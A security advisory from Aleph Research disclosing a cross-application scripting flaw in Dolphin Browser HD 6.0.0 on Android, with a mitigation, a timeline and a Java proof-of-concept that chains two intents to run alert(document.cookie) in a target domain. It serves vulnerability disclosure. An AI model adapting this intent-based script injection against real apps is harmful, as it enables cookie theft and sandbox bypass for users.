Dolphin Browser HD Cross-Application Scripting

Aleph Research Advisory

Identifier

ALEPH-2011006

Severity

High

Product

Dolphin Browser HD

Vulnerable Version

Version 6.0.0

Mitigation

Install version 6.1.0 or later.

Technical Details

A 3rd party application may exploit Dolphin Browser HD’s URL loading process in order to inject JavaScript code into an arbitrary domain thus break Android’s sandboxing. This can be done by sending two consecutive startActivity calls. The first call includes the attacked domain, and causes Dolphin Browser HD to load it, while the second call contains JavaScript code. the JavaScript URI will be opened under the current tab, i.e. the attacked domain.

Proof-of-Concept

public class CasExploit extends Activity
{
    static final String mPackage = "mobi.mgeek.TunnyBrowser";
    static final String mClass = "BrowserActivity";
    static final String mUrl = "http://target.domain/";
    static final String mJavascript = "alert(document.cookie)";
    static final int mSleep = 15000;

    @Override
    public void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        setContentView(R.layout.main);
        startBrowserActivity(mUrl);
        
        try {
            Thread.sleep(mSleep);
        }
        
        catch (InterruptedException e) {}
        startBrowserActivity("javascript:" + mJavascript);
    }
    private void startBrowserActivity(String url) {
        Intent res = new Intent("android.intent.action.VIEW");
        res.setComponent(new ComponentName(mPackage,mPackage+"."+mClass));
        res.setData(Uri.parse(url));
        startActivity(res);
    }
}

Timeline

01-Mar-17
: Added as ALEPH-2011006.
20-Sep-11
: Public disclosure.

Credit

Roee Hay (@roeehay) of Aleph Research, HCL Technologies
Yair Amit (@yairamit)

External References

Android Browser XAS paper